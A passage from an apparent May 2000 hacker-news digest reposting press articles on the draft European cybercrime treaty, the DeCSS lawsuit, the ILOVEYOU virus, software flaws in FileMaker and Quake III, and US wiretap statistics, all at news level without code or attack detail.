3:00 a.m. May. 3, 2000 PDT

WASHINGTON -- U.S.
and European police agencies will receive new powers to investigate and prosecute computer crimes, according to a preliminary draft of a treaty being circulated among over 40 nations.

The Council of Europe's 65KB proposal is designed to aid police in investigations of online miscreants in cases where attacks or intrusions cross national borders.

But the details of the "Draft Convention on Cybercrime" worry U.S. civil libertarians. They warn that the plan would violate longstanding privacy rights and grant the government far too much power.

The proposal, which is expected to be finalized by December 2000 and appears to be the first computer crime treaty, would:

* Make it a crime to create, download, or post on a website any computer program that is "designed or adapted" primarily to gain access to a computer system without permission. Also banned is software designed to interfere with the "functioning of a computer system" by deleting or altering data.
* Allow authorities to order someone to reveal his or her passphrase for an encryption key. According to a recent survey, only Singapore and Malaysia have enacted such a requirement into law, and experts say that in the United States it could run afoul of constitutional protections against self-incrimination.
* Internationalize a U.S. law that makes it a crime to possess even digital images that "appear" to represent children's genitals or children engaged in sexual conduct. Linking to such a site also would be a crime.
* Require websites and Internet providers to collect information about their users, a rule that would potentially limit anonymous remailers.

U.S. law enforcement officials helped to write the document, which was released for public comment last Thursday, and the Justice Department is expected to urge the Senate to approve it next year. Other non-European countries actively involved in negotiations include Canada, Japan, and South Africa.
During recent testimony before Congress, Attorney General Janet Reno warned of international computer crime, a claim that gained more credibility last month with the arrest of alleged denial-of-service culprit Mafiaboy in Canada. "The damage that can be done by somebody sitting halfway around the world is immense. We have got to be able to trace them, and we have made real progress with our discussions with our colleagues in the G-8 and in the Council of Europe," Reno told a Senate appropriations subcommittee in February, the week after the denial-of-service attacks took place. "Some countries have weak laws, or no laws, against computer crimes, creating a major obstacle to solving and to prosecuting computer crimes. I am quite concerned that one or more nations will become 'safe havens' for cyber-criminals," Reno said. Civil libertarians say the Justice Department will try to pressure the Senate to approve the treaty even if it violates Americans' privacy rights. "The Council of Europe in this case has just been taken over by the U.S. Justice Department and is only considering law enforcement demands," says Dave Banisar, co-author of The Electronic Privacy Papers. "They're using one more international organization to launder U.S. policy." Banisar says Article 6 of the measure, titled "Illegal Devices," could ban commonplace network security tools like crack and nmap, which is included with Linux as a standard utility. "Companies would be able to criminalize people who reveal security holes about their products," Banisar said. "I think it's dangerous for the Internet," says Barry Steinhardt, associate director of the American Civil Liberties Union and a founder of the Global Internet Liberty Campaign. "I think it will interfere with the ability to speak anonymously." "It will interfere with the ability of hackers -- using that term in a favorable light -- to test their own security and the security of others," Steinhardt said. 
Solveig Singleton, director of information studies at the libertarian Cato Institute says it's likely -- although because of the vague language not certain -- that anonymous remailers will be imperiled.

The draft document says countries must pass laws to "ensure the expeditious preservation of that traffic data, regardless whether one or more service providers were involved in the transmission of that communication." A service provider is defined as any entity that sends or receives electronic communications.

Representing the U.S. in the drafting process is the Justice Department's Computer Crime and Intellectual Property section, which chairs the G-8 subgroup on high-tech crime and also is involved with a cybercrime project at the Organization of American States. In December 1997 Reno convened the first meeting on computer crime of the G-8 nations.

A recent White House working group, which includes representatives from the Justice Department, FBI, and Secret Service has called for restrictions on anonymity online, saying it can provide criminals with an impenetrable shield. So has a report from a committee of the European Parliament.

Other portions of the treaty include fairly detailed descriptions of extradition procedures and requirements for countries to establish around-the-clock computer-crime centers that police groups in other countries may contact for immediate help.

The Council of Europe is not affiliated with the European Union, and includes over 40 member nations, including Russia, which joined in 1996. After the Council of Europe's expert group finalizes the proposed treaty, the full committee of ministers must adopt the text. Then it will be sent to countries for their signatures.

Comments can be sent to daj@coe.int.

@HWA

148.0 [HNN] Vulnerabilities Found in FileMaker
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 3rd
contributed by acopalyse

FileMaker Pro 5 database package has security flaws in the Web Companion software.
This flaw allows Internet users to view the contents of online Web Companion databases and access the plug-in's e-mail functions without authorization. A third flaw allows unauthorized users to send anonymous or impersonated e-mail. FileMaker says that no customers have yet complained about this problem.

MacWeek
http://macweek.zdnet.com/2000/04/30/0501fmresponds.html

Monday, May 1, 2000

FileMaker admits security flaws

FileMaker on Monday issued a statement confirming security flaws in the Web Companion software that's part of the company's FileMaker Pro 5 database package.

The flaws, first reported by software developer Blue World Communications, make it possible for Internet users to view the contents of online Web Companion databases and access the plug-in's e-mail functions without authorization. A third flaw allows unauthorized users to send anonymous or impersonated e-mail. Web Companion is a plug-in that allows users to post FileMaker databases on the Web.

"At this point, we know of no customers who have experienced problems due to these issues, and these issues only concern users publishing FileMaker databases via our Web Companion," FileMaker public relations manager Kevin Mallon said in the statement. "But because the security of our customers' data is and always has been an overriding priority at FileMaker, we are committed to sharing what we know quickly and accurately.

"More importantly, we intend to fully investigate and address any bugs as quickly as possible. Resolving these issues is a top priority for FileMaker."

Mallon wrote that "some technologies in the Web Companion may inappropriately expose field contents which the user thinks are protected by Field-Level Security. FileMaker intends to address this problem as soon as possible."
Until FileMaker issues a fix, he said that users should be aware that Field-Level Security may not be reliable, and suggested alternative security schemes, such as password protection in FileMaker or Function-Level Security in the Web Security Database.

Mallon advised Web administrators concerned about the e-mail flaw to activate Web Companion's Logging feature--accessed through Preferences--to track requests sent to the plug-in. "This is a good general practice in any case," he wrote.

Blue World said that customers can set up the company's Lasso Web Data Engine as a secure proxy for Web Companion databases, allowing use of Lasso's security features to restrict access. Other alternatives include disabling Web Companion or using an earlier version of FileMaker.

@HWA

149.0 [HNN] Internet Threat gets Four Months
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 3rd
contributed by Code Kid

An 18-year-old student has been sentenced to four months in jail for issuing a threat over the Internet. Michael Ian Campbell had pleaded guilty last February to 'transmitting a threat of violence' against Columbine High School via an Internet chat room. His lawyer attempted a novel defense based on 'Internet intoxication.' (Yes, Columbine was a tragedy but if this threat had been made face to face I'd bet no one would have even taken it seriously let alone arrest the guy and give him four months.)

Newsbytes - via Computer User
http://www.currents.net/news/00/05/02/news2.html

Daily News

Teen Sentenced in Columbine Web Threat
By Martin Stone, Newsbytes
May 02, 2000

A judge in Denver has reportedly handed down a four-month prison sentence to an 18-year-old Florida man convicted of sending a chat-room message threatening violence at Columbine High School, scene of a shooting spree last year which claimed 15 lives.

A Reuters report Monday said the teen, Michael Ian Campbell, collapsed in the courtroom after being handed the sentence.
Campbell pleaded guilty in February to "transmitting a threat of violence" across state lines. His lawyer attempted a novel defense based on "Internet intoxication."

The report said a Columbine student, 16-year-old Erin Walton, was in a chat room on Dec. 15 when Campbell told her to stay away from school the next day because he planned to "finish what begun," which authorities argued made a clear reference to the massacre and led school officials to cancel classes for two days.

Campbell is reported to be suffering from depression and had attempted suicide following his arrest at his Florida home after officials at America Online helped police trace the origin of the message. He has since apologized for the episode, and prosecutors had recommended a light sentence.

But, the judge maintained that though he could have given Campbell probation or a sentence of up to six months, he felt the four-month sentence would serve as a deterrent to others, the report said.

Reported By Newsbytes.com, http://www.newsbytes.com .

@HWA

150.0 [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 3rd
contributed by root66

Kevin Sills, a police officer in New York City, was charged that between 1996 and 1998, Mr. Sills possessed software that was programmed to intercept alphanumeric pager messages -- a violation of §2512(1)(b) of the Electronics Communications Privacy Act. It also charged Mr. Sills with violating §2511(1)(a) of the act by intercepting such messages. Mr. Sills claimed that since there was dissemination of the interception, either for profit or other reasons, that the law should not apply. Senior Judge Shirley Wohl Kram disagreed and has refused to dismiss the case.
The National Law Journal
http://www.nylj.com/stories/00/05/050200a1.htm

Pager Eavesdropping Trial OK'd
BY MARK HAMBLETT
New York Law Journal
Tuesday, May 2, 2000

A CHALLENGE to a federal prosecution under the Electronics Communications Privacy Act involving eavesdropping of alphanumeric pagers has been rejected by a Southern District judge.

Senior Judge Shirley Wohl Kram refused to dismiss a case against a New York City police officer who allegedly used software to read paging messages by the police department. Judge Kram rejected arguments by the officer that reading the pages is not forbidden under the act, and that he was the victim of selective prosecution in the case, United States v. Sills, 99 Cr. 1133.

Kevin Sills, a police officer for the city since 1996, was the subject of a sting operation in 1998 by a criminal investigator working for the U.S. Attorney's Office. The two-count indictment charged that between 1996 and 1998, Mr. Sills possessed software that was programmed to intercept alphanumeric pager messages — a violation of §2512(1)(b) of the act. It also charged Mr. Sills with violating §2511(1)(a) of the act by intercepting such messages.

The software, called "Message Tracker," is manufactured by a Texas company called K & L Technology. When used in conjunction with a radio scanner, Message Tracker can be used to intercept messages from the targeted pager and display them on a computer.

In phone conversations with an employee of K & L Technology who was cooperating with the investigator, Mr. Sills allegedly said that he had been reading other pagers, asked the employee if the company would modify his scanner so it worked in conjunction with a more advanced version of Message Tracker and then ordered the modifications to be done.

Investigator Ronald G. Gardella, posing as a Federal Express delivery man, then delivered to Mr. Sills' home his newly modified scanner and the latest version of Message Tracker software.
An ensuing search of the premises allegedly turned up a computer file containing "Capcodes," which, along with specific radio frequency, make up the electronic address for pagers and distinguishes them from other pagers. Prosecutors charged that one of the Capcodes in that file belonged to the pager used by the body guard and driver for Police Commissioner Howard Safir.

Mr. Sills moved to dismiss the charges before Judge Kram. First, he said his conduct was exempt under §2511(g) of the act, which excludes any radio communication transmitted by any governmental, law enforcement or public communications system "readily accessible to the general public."

Quoting the statute, Judge Kram said the act defines "readily accessible" as radio communications that are not "transmitted over a communication system provided by a common carrier, unless the communication is a tone only paging system communication."

Not 'Tone Only'

She said it was "undisputed" that the communications being intercepted by Mr. Sills were not "tone only" transmissions, and therefore, the transmissions at issue were not "readily accessible to the general public."

Mr. Sills argued that he was singled out because he was a police officer and said that "this case appears to be the first prosecution, in this district or anywhere, involving alphanumeric pager interceptions when there is no dissemination of the intercepted information."

He said the equipment he used was advertised on the open market and the government has never chosen to prosecute news organizations and private individuals who "knowingly pay for intercepted police pager communications."

Mr. Sills said that when the government prosecuted the Breaking News Network for profiting from the dissemination of intercepted pager information, including police messages, the government did not prosecute people or news organizations who paid for BNN's service.

Judge Kram disagreed. "Whereas BNN's customers obtained pager messages through a purported 'service provider,' Sills directly intercepted them," she said.

Assistant U.S. Attorney David Raskin represented the government. Bradley D. Simon represented Mr. Sills.

@HWA

151.0 [HNN] 2600 Secures Big Time Lawyer
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 4th
contributed by jandrews

Emmanuel Goldstein has retained the services of New York lawyer Martin Garbus in his case against the MPAA regarding his posting of DeCSS to his web site. Garbus has defended such luminaries as Lenny Bruce, Timothy Leary, and George Wallace. He has won all 20 of his arguments before the Supreme Court. Garbus plans to argue that DeCSS is an innovation in interoperability, and therefore protected under the "fair use" principle of the First Amendment.

"There is little question in my mind this persecution of hackers is, in many respect, analogous to the Communist red-baiting of yore. They are being unfairly maligned, and stigmatized, without due cause." - Martin Garbus

Village Voice
http://www.villagevoice.com/issues/0018/howe.shtml

DOWN BY LAW
BY JEFF HOWE

When Movie Moguls Wage War to Protect Copyright, the First Amendment Ends Up on the Cutting Room Floor

In the world of Martin Garbus, we are all teachers and he is the student. This at least partly explains why an otherwise innocent DVD player lies in pieces on the coffee table in his Madison Avenue law office. The teacher today is Chris DiBona, prominent evangelist of the open-source creed—the belief that computer code, like speech, wants to be free. DiBona is teaching Garbus, who only recently learned how to work his own e-mail, why a miniscule bit of silicon in this player—and an equally miniscule program built to bypass it—have sparked a federal case that will determine whether we pass through the digital age with the First Amendment intact.

As DiBona speaks, pointing at various organs in the innards of the DVD player, Garbus leans forward and listens intently.
Very intently. You can almost hear the sound of files shifting and expanding inside Garbus's cerebrum. The force of this man's concentration could bend spoons, or laws. "I chose this life so I could forever remain a student," Garbus says, in a not-infrequent display of mock humility. This life, as it happens, has also allowed Garbus to remain a high-profile rebel. Perhaps the closest thing in New York to a modern-day Daniel Webster, Garbus has made a living by fighting the dark side in all its forms. A laundry list of Garbus's clients reveals a Zelig-esque talent for being on the right side of the right fight at the right time. Garbus fought for Lenny Bruce in '64, for Timothy Leary in '66, and against Alabama governor George Wallace in '68. A few years later he hid the Pentagon Papers in his attic for reporter Daniel Ellsberg. He has argued before the Supreme Court on 20 occasions, winning each time. Garbus has fought to protect the copyright of work by Samuel Beckett, Robert Redford, Al Pacino, and John Cheever. The hacker's writer: Web scribe Eric Corley launched a First Amendment fight when he posted a program that breaks the code of DVDs. So why has Garbus, with his eye for the limelight and his zeal for the sanctity of intellectual property, taken on the cause of a Long Island cyberjournalist accused by the Motion Picture Association of America of being a copyright thief? "He gets it," says his client, Eric Corley, publisher of the quarterly journal 2600 (www.2600.com), commonly referred to as the "hacker bible," and enemy number one of big Hollywood. Last fall Corley, who goes by the nom de Net of Emmanuel Goldstein, posted to 2600 a program that allows technology-savvy folk to decipher the code of DVDs and then view the films on unlicensed players. The open-source set calls this a First Amendment right. Hollywood calls it piracy and fears a brave new world where people get their movies on the Web for free. 
In January, the motion picture association slapped Corley and two other defendants with a federal suit alleging copyright violation. When Corley says Garbus "gets it," he's offering no light praise, since factual error, bald deception, and simple misunderstanding have obscured what initially looked like an open-and-shut case for the motion picture industry. The movie moguls are banking on the Digital Millennium Copyright Act of 1998, which expressly forbids providing anything "primarily designed or produced for the purpose of circumventing a technological measure that effectively controls access to a [copyrighted] work." In plain English, that means you can't hand out a tool that breaks through copyright protection. The tool now in question is DeCSS, which appears to smash those barriers, bypassing the Content Scrambling System that guards DVDs and allowing users to do with the contents what they will. Armed with that premise, Hollywood took round one by a rout in January, as a federal district judge granted an injunction that blocked Corley and the other defendants (who have since been dropped from the suit) from posting DeCSS. But Corley battled back, posting a collection of links to sites around the world willing to offer the program. That prompted the motion picture association last month to ask that the injunction be extended to ban such links. By any account except Hollywood's, granting the request would be an egregious gagging of free expression. A newspaper like this one, for instance, would be forbidden from telling its readers how to find the source code to DeCSS on cryptome.org. This so-called prior restraint is a special bugbear of the fourth estate. No surprise, then, that The New York Times has expressed its concern and may file a brief on behalf of Garbus and his client. For his part, Garbus will submit that DeCSS is an exercise in cryptography, an innovation in interoperability, and protected speech to boot. 
Under that argument, the program should be covered by the "fair use" principle of the First Amendment—putting the Digital Millennium Copyright Act and freedom of expression at irreconcilable odds.

The case for the defense does not look good. The entertainment industry is garnering court victories in the fight between the right of commerce to protect intellectual property and the right of Netizens like Corley to speak their minds. Last week, a federal judge in New York ruled for the Recording Industry Association of America in its copyright infringement suit against MP3.com, which allows users to post and download CDs for online listening.

Garbus knows lower courts are not often inclined to contradict Congress, so he's already plotting strategies for appeal all the way to the Supreme Court. The matter is being closely followed by Internet wonks, pundits, and practitioners, not to mention those civil libertarians who "get it."

"If the judge finds for the plaintiff, and the decision isn't knocked down on appeal," says Yochai Benkler, a professor of information law at New York University, "it will create an environment that's closed like nothing we've ever seen before."

Welcome to the latest front in the war for the First Amendment.

--------------------------------------------------------------------------

Eric Corley looks like a hacker. All stringy black hair, pale skin, and hunched shoulders, Corley has the unmistakable pallor of someone who spends most of his time alone in front of a computer screen. Hollywood could not have picked a better physical specimen for their relentless campaign to portray the open-source community—programmers and users of operating systems and software whose source code is freely available—as "thieves and pirates."

But Corley fails that test in one important regard: He does not hack. He "couldn't hack his way into a paper bag," says one ex-hacker who, naturally, chooses to remain anonymous.
No electronic trespasser, Corley is a journalist—and not one lacking in considerable credentials. His journal 2600, founded in 1984, boasts a circulation of 60,000. Between 10,000 and 15,000 visitors drop by the site. Corley hosts a weekly radio broadcast and has appeared on numerous talk shows, including Charlie Rose, Nightline, and 60 Minutes. He has testified before Congress and written editorials for the Times and the Daily News. He gave the commencement address when he graduated from SUNY Stony Brook. He says the movie moguls didn't know how much fight they'd get when they homed in on him. "It was foolish of them to pick [2600]," Corley says. "We've always stood up against this kind of thing. We don't know how to back down." The fact that Corley is a scribe for the hacker world may make him a likely suspect for the motion picture association, but not necessarily a wise one. Corley counts among his admirers—and readers—countless programmers and academics. Oddly, the same logic that made him a target for the movie industry also made him a client that Garbus couldn't pass up. In the DVD trial, the First Amendment lawyer found a story with clearly drawn opponents worthy of a pulp-fiction plot: a powerful, wealthy industry versus a corps of overworked, denigrated protectors of civil liberties. This is white hats against black hats, heroes facing up to villains, good law butting heads with bad. With self-righteous zeal, the motion picture association has harassed open sourcers and free-speech advocates who have posted, or merely linked to, the program once offered by Corley. Soon after Hollywood realized movie discs had been hacked, they fired a salvo of cease-and-desist letters to anyone offering DeCSS. On December 28, the trade organization in charge of licensing movie rights for DVD players filed suit in California, naming 21 individuals and "Does 1-500, inclusive." 
That's Does as in John, a deft bit of legal language that allows the plaintiff to attack retroactively anyone it chooses. In mid January, Norwegian authorities raided the Oslo home of 16-year-old Jon Johansen, who is accused of first providing DeCSS on the Web.

From the beginning, the movie association has made little effort to disguise its enmity toward the hacker community, calling them "nerds" and "anarchists." The group has sent cease-and-desist letters to people in Germany and Australia, places far outside the jurisdiction of injunctions issued in the United States. A 2600 correspondent in Connecticut has been targeted with another federal suit, and a University of Wisconsin student was fired from his job at a computer lab after a letter from Hollywood landed on his boss's desk.

For Garbus, the plight of the open-source community is clear. "There is little question in my mind this persecution of hackers is, in many respects, analogous to the Communist red-baiting of yore," he says. "They are being unfairly maligned, and stigmatized, without due cause."

According to John Gilmore, the co-founder of the Electronic Frontier Foundation, a civil-liberties group that has picked up the defense tab in all the DVD suits, the program Corley posted was originally one part of an open-source project to develop a movie disc player for the Linux operating system favored by hardcore programmers.

Linux supporters saw Hollywood's tactics as a call to arms. They posted thousands of copies of DeCSS throughout the Web as a show of support for Corley. And if the online proliferation weren't enough, the lawyers representing Hollywood accidentally entered the entire DeCSS source code into the public record.

All this for a program that Corley and much of the computing community insist doesn't even do what the film executives say it does: encourage the copying of DVDs.
Corley argues DeCSS exists solely to allow people to view movies they own on unlicensed players, like ones that run on Linux—an operating system Hollywood refused to license.

"You have to wonder, why are they so upset at people knowing how to use their technology?" Corley says. "They don't care about copying. Copying is easy. People have been copying for ages. There are whole warehouses in Asia copying DVDs and nothing else."

Yet when the film industry first filed suit in California last November, president Jack Valenti raised the specter of marauding hackers and thieves out to defraud Hollywood. Valenti told Daily Variety: "[W]e don't have broadband access today, so we don't have many [pirated] movies on the Internet today . . . By the middle or end of next year, we will have an avalanche."

But a month before Valenti's apocalypse was scheduled to appear, a lawyer for the industry group admits he, the former deputy director of the antipiracy division, has yet to uncover a single instance of piracy using DeCSS. "Do I know of any incidents of piracy, personally? No," says Greg Goeckner. "But I would have to check with my team in the field."

The movie association may have a hard time uncovering any pirates sailing under the DeCSS flag. Gilmore, of the Electronic Frontier Foundation, explains that DVD movies are far too big for easy duplication. "The only place you could store your movie would be on your hard drive," he says, "and even then you could only hold four such movies at most." Gilmore also points out that it could take hundreds of hours to download a DVD over a 56k modem, so merely transferring these files would mean disabling your computer for weeks, all for the purpose of gaining a bootleg copy of The Matrix.

The film association hasn't found any instances of DeCSS piracy for one simple reason: There's no cause to do it.
--------------------------------------------------------------------------------

If DeCSS isn't likely to be used for pirating movies, why does the program pose a threat so dire that Hollywood turned to the courts for relief?

This will be one of Garbus's first questions, if he ever sees the courtroom on Corley's behalf. On April 25, attorneys for the movie association filed a motion to disqualify Garbus from the case. Garbus's firm, it turns out, represents Scholastic in an unrelated case. Time Warner, a member of the association, owns Scholastic, and you're not supposed to defend and attack the same client at the same time.

This technicality may be enough to kick Garbus out of the suit. "He probably has a 50-50 chance," speculated one legal observer close to the action. If Hollywood wins, Garbus is gone, barred from appearing for Corley as counsel. The Electronic Frontier Foundation and Corley go back to soliciting solicitors, their appeal enhanced through association with Garbus.

If the motion fails, the movie execs will have a formidable foe on their hands. War is hell and so is law, and Garbus sees little difference between the two. But a firebrand trial lawyer isn't all Corley gets. Garbus is an icon of "East Coast Code," a term coined by Lawrence Lessig to describe the legal code. Garbus must now convince the court to consider the rights of "West Coast Code," or source code.

He will argue that DeCSS falls under the First Amendment's fair-use exception to the Copyright Act. The doctrine of fair use permits, for example, a reporter to quote paragraphs from a book or print sections of a pamphlet. In the case of DVDs, the only way a consumer can copy specific portions is to use DeCSS. Barring people from doing that is a more insidious encroachment on individual liberty than it first appears.

"Say you want to criticize the liberal leanings of Hollywood, or criticize the sexist movie of this or that," says Benkler, the NYU law professor. "You need to be able to quote little pieces of the movie. You can do that under the copyright law, because that's fair use, but using DVDs lawfully as the [film association] reads the law, you can't do that. This really extinguishes user privilege to an unprecedented degree."

This same privilege was tried—and survived—in an oft-cited suit in 1984 involving Betamax, which manufactured early video recorders. The question then was the same one asked now: whether the entertainment industry's right to safeguard its products carries more weight than the right of individuals to access copyrighted works for their own expressive, and protected, ends.

The First Amendment also protects a process called reverse-engineering, which was used to create DeCSS. Reverse engineers take things apart in order to learn how to put them back together in a better form. In other words, to build a better mousetrap. The right to take things apart—whether breakfast cereals or pharmaceutical compounds—is a time-honored tenet in American law, held to encourage innovation.

So far, judges have been friendly to reverse engineers. This year, the Ninth U.S. Circuit Court of Appeals ruled that Connectix's Virtual Game Station, which allows Mac users to play Sony PlayStation games on their computers, had not violated copyright law because it was reverse-engineered from PlayStation.

In the case of DeCSS, the upshot is that the program is already out there. The DVD encryption was a flimsy system that everyone in the open-source world knew would be hacked, sooner rather than later. East Coast Code may enjoin open-source programmers and "pirates" from posting and trading DeCSS, but with an estimated 300,000 copies already in existence, only West Coast Code, i.e., a better encryption scheme, is going to maintain Big Hollywood's grip on user privilege.

In the Wild, Wild Web, you're responsible for your own fences. East Coast Code don't mean shit.

Tell us what you think.
editor@villagevoice.com

@HWA

152.0 [HNN] Virus Says 'I Love You'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 4th

contributed by Evil Wench

A virus making the rounds of Asia is very similar to Melissa but has a subject of "I Love You". The fast spreading virus has already hit several dozen businesses in Hong Kong clogging their email systems.

Wall Street Journal - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2561663,00.html

'I love you' e-mail virus spreading

A Melissa-like computer virus, bearing the title 'I love you,' is sweeping through Asia and appears to be spreading worldwide.

WSJ Interactive Edition
May 4, 2000 4:40 AM PT

HONG KONG -- A computer virus spread by e-mail messages bearing the title "I Love You" spread through Asian businesses Thursday afternoon, and appeared to be quickly tainting computer systems world-wide.

If the attachment holding the virus is opened, the virus apparently multiplies by finding other e-mail addresses and prompting the computer to generate new e-mail. Victims sometimes receive dozens of e-mail messages, all contaminated with the virus.

The virus, which appeared in Hong Kong late Thursday afternoon, seemed to particularly hit, among other businesses, public relations firms and investment banks. Dow Jones and the Asian Wall Street Journal offices in Asia were among its victims.

In Hong Kong, Nomura International Ltd. is receiving the e-mail virus, an analyst said. The virus has created a lot of damage in Nomura's London office, he said. "It just multiplies through the system and eradicates whole address books," the analyst said.

Simon Flint, currency strategist at Bank of America in Singapore, said he has received e-mail messages warning him of the virus but hasn't received the actual virus

@HWA

153.0 [HNN] Quake III Flaw Leaves Users Vulnerable
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 4th

contributed by Code Kid

A security hole in Quake III could leave users vulnerable to internet attack while they play the game.
The hole could allow a malicious server operator to overwrite any file on a client system. Id Software was notified of the issue by Internet Security Systems, Inc. who held off on announcing the hole until Id Software could issue a patch.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2561554,00.html

Quake III flaw could frag your computer

Apply the patch now. Otherwise, a Trojan server could be shooting up your system while you play.

By Rob Lemos, ZDNet News
May 3, 2000 5:34 PM PT

Game developer Id Software Inc. announced on Wednesday that its flagship first-person shooter has a security flaw that could leave Quake III players' computers open to attack while they play.

"The basic nature of the exploit is that malicious server operators could overwrite any file on a client system," wrote Robert Duffy, a programmer at Id Software, in his .plan file on Wednesday.

The flaw was found last week by network security firm Internet Security Systems Inc. and could allow an attacker running a Quake III server to read and write to any player's computer connecting to that server.

Internet Security Systems waited until Id Software could issue a patch before sending out an alert to users and the press.

"This vulnerability is important to network administrators who may be unaware that users are accessing potentially malicious Quake3Arena servers outside their network," wrote Internet Security Systems in the alert.

Id Software fixed the flaw in its latest patch release, Version 1.17, released on Wednesday. To force users to move over to the secured Quake III client, Id Software has made Version 1.17 of the game incompatible with earlier -- and insecure -- versions.

@HWA

154.0 [HNN] Phone Taps on the Rise
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 4th

contributed by Evil Wench and root66

Federal and State law enforcement agencies ordered 20% more wiretaps last year on cell phones, pagers, fax machines, and email.
The total number of wiretaps ordered last year was 1,350 of which only 30% were the traditional 'bug' hidden in a wall or clamped onto a phone line. The rest were done digitally at the phone station or by eavesdropping in electronically.

USA Today
US Courts
http://www.usatoday.com/life/cyber/tech/cth831.htm
http://www.uscourts.gov/Press_Releases/press_050100.html

06/07/00- Updated 07:51 PM ET

Technology boosts government wiretaps

Fax machines, cell phones, pagers and e-mail targeted

By Richard Willing, USA TODAY

WASHINGTON - Wiretaps ordered by federal and state authorities on cell phones, pagers, fax machines and e-mail increased by nearly 20% last year, pushing the total number of government wiretaps to a record 1,350.

Traditional wiretaps, such as microphones hidden in walls and "bugs" planted on telephone lines, account for about one-third of all surveillance devices, according to an annual wiretap survey released Tuesday by the Administrative Office of the U.S. Courts.

Many of the taps were done by devices that pluck calls from the air or eavesdrop at cellular phone switching stations. Nearly three-quarters of the taps were ordered in narcotics investigations, the report said.

The overall increase was fueled by improved surveillance technology and by the continued aggressive use of taps by the Clinton administration Department of Justice. In 1999, the Justice Department got court permission to carry out 601 wiretaps, up from the 340 authorized in 1992, the year before Clinton took office.

"Clinton supported wiretapping when he was governor of Arkansas, and there's been a noticeable push since he became president," said David Banisar, senior fellow of the Electronic Privacy Information Center, a watchdog group in Washington.

"At the same time, you've got the explosion in cell phones happening," Banisar said. "Everyone is using them, including the people the police want to intercept."
Justice Department spokeswoman Chris Watney said wiretaps were used in fewer than 1% of the 50,000 criminal cases brought by the department last year. "That shows you how selective we are in deciding when wiretaps are necessary and appropriate," she said.

Under a 1968 federal law and separate laws in 42 states, police may obtain permission to tap only by convincing a judge that the device would produce evidence of a crime that could not be obtained any other way. No state or federal request was turned down last year; three have been rejected since 1989.

Among the report's other findings:

Wiretaps sought by state and local authorities declined by 2% last year, the first such decrease since 1995.

The overall increase in wiretaps produced more arrests in 1999 but a lower conviction rate, about 15%.

Five states - New York, California, New Jersey, Pennsylvania and Illinois - accounted for 81% of all state-ordered wiretaps approved last year. Fourteen of the 42 states that authorize wiretaps ordered no taps.

Federal agents sought authority for seven e-mail taps last year, two more than in 1998.

"Roving" taps, a recently authorized federal technique aimed at individuals rather than phone or pager numbers, increased from 12 in 1998 to 23 last year.

The tendency to rely on wiretaps varied among prosecutors. Taps were used extensively, for example, in federal drug investigations in central California and southern Florida. New York City's Special Narcotics Bureau got permission for 135 taps, more than any state other than New York.

New technology helped simplify the process of tapping cell phones. Increasingly, cell phone tappers listen in at central switching stations as calls are relayed to other cellular or hard-wired phones. Police also use "trigger fish," devices that can pluck cell calls out of the air but must be used near the caller.

-=-

NEWS RELEASE

Administrative Office of the U.S. Courts
May 1, 2000
Contact: Karen Redmond

Surveillance of Drug Offense Operations Drives 1999 Growth in Applications for Wiretaps

The number of applications for wiretap orders requested in 1999 rose 2 percent to 1,350, up from 1,331 in 1998, according to the 1999 Wiretap Report, A Report of the Director of the Administrative Office of the United States Courts on Applications for Orders Authorizing or Approving the Interception of Wire, Oral, or Electronic Communications. Federal or state judges authorized all applications that were requested.

In 1999, violation of drug laws remained the major offense investigated through wiretaps, with racketeering as the second largest category. The most common location for the placement of wiretaps was in a single family dwelling. In 1999, a total of 4,372 persons were reported arrested based on interceptions of wire, oral, or electronic communications.

The wiretap report is submitted annually to Congress by the Administrative Office of the U.S. Courts. During 1999, 28 jurisdictions reported using wire, oral or electronic surveillance as an investigative tool. The federal government, the District of Columbia, the Virgin Islands and 42 states currently have laws authorizing courts to issue orders permitting such surveillance.

The number of applications approved by federal courts in 1999 increased 6 percent, while approvals by state courts fell 2 percent below the 1998 levels. (See attached Table 1.) Wiretap applications in New York (343 applications), California (76), New Jersey (71), Pennsylvania (69), and Illinois (50) accounted for 81 percent of all authorizations approved by state judges.

Most state laws limit the period of surveillance under an original order to 30 days, although extensions may be granted. Among state wiretaps, the longest was a 510-day intercept used in a racketeering investigation in New York County, New York.
The longest federal intercept occurred in the Western District of Texas, where a 289-day wiretap was used in a narcotics investigation.

A total of 978 intercept applications, or 72 percent of all applications for intercepts authorized in 1999, cited drug offenses as the most serious offense under investigation. Several criminal offenses may be under investigation, but only the most serious offense is named in an application. The use of federal intercepts to conduct drug investigations was most common in the Central District of California (38 applications) and the Southern District of Florida (34 applications). On the state level, the New York City Special Narcotics Bureau obtained authorizations for 135 drug-related intercepts, which accounted for the highest percentage of all drug-related intercepts reported by state or local jurisdictions. Racketeering was cited in 139 of the applications, followed by homicide/assault (62), and gambling (60). (See attached Table 7.)

In 1999, 18 percent of all intercept devices, or 248 wiretaps, were authorized for single-family dwellings, a category that includes houses, rowhouses, townhouses, and duplexes. Forty-nine percent of intercept applications, or 663 applications, specified “other” locations. These may include electronic wiretaps such as mobile telephones, electronic pagers, and cellular telephones.

As of December 31, 1999, a total of 4,372 persons had been arrested based on interceptions reported. Fifteen percent, or 654 persons, were convicted. Federal wiretaps were responsible for the most arrests (66 percent) and convictions (55 percent). A wiretap in the Western District of New York resulted in the arrest of 83 persons, the most arrests of any intercept in 1999. A wiretap in the Southern District of Florida produced the most convictions of any wiretap when an intercept used in a drug investigation resulted in the conviction of 23 of the 26 persons arrested.
Among state intercepts, the intercept producing the most arrests took place in Middlesex County, New Jersey, where an intercept in a drug investigation resulted in the arrest of 72 persons.

